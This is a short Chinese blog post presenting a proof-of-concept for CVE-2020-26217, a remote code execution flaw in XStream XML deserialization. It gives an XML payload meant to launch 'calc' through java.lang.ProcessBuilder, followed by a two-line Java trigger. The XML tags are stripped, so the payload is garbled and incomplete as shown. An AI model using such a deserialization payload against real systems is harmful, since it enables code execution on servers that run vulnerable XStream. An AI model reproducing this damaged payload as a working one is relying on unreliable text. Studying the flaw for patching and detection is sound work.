(CVE-2020-26217)XStream_XML反序列化远程代码执行

# (CVE-2020-26217)XStream XML反序列化远程代码执行

https://x-stream.github.io/CVE-2020-26217.html

“`xml



0



text/plain




0
-1
1



calc






java.lang.ProcessBuilder
start

start



KEYS


0 0
0


false


0


test

“`

“`
XStream xstream = new XStream();
xstream.fromXML(xml);
“`

![image-20201117135642244](/static/qingy/(CVE-2020-26217)XStream_XML反序列化远程代码执行/img/image-20201117135642244.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容